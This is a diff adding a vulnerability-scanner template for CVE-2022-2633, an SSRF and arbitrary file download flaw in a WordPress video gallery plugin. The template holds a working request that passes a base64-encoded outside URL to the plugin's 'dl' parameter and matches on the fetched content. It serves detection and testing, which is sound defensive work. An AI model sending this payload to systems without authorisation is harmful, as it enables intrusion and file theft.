diff --git a/cves/2022/CVE-2022-2633.yaml b/cves/2022/CVE-2022-2633.yaml new file mode 100644 index 0000000000..2665ed463c --- /dev/null +++ b/cves/2022/CVE-2022-2633.yaml @@ -0,0 +1,36 @@ +id: CVE-2022-2633 + +info: + name: All In One Video Gallery Plugin - Unauthenticated Arbitrary File Download & SSRF vulnerability + author: theamanrawat + description: | + Unauthenticated Arbitrary File Download & SSRF vulnerability in WordPress All In One Video Gallery Plugin (versions <= 2.6.0). + reference: + - https://wpscan.com/vulnerability/852c257c-929a-4e4e-b85e-064f8dadd994 + - https://blog.amanrawat.in/2022/09/28/CVE-2022-2633.html + - https://wordpress.org/plugins/all-in-one-video-gallery/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2633 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2633 + classification: + cve-id: CVE-2022-2633 + metadata: + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,unauth,all-in-one-video-gallery,ssrf + +requests: + - raw: + - | + @timeout: 10s + GET /index.php/video/?dl={{base64('http://interact.sh/')}} HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Interactsh Server' + + - type: status + status: + - 200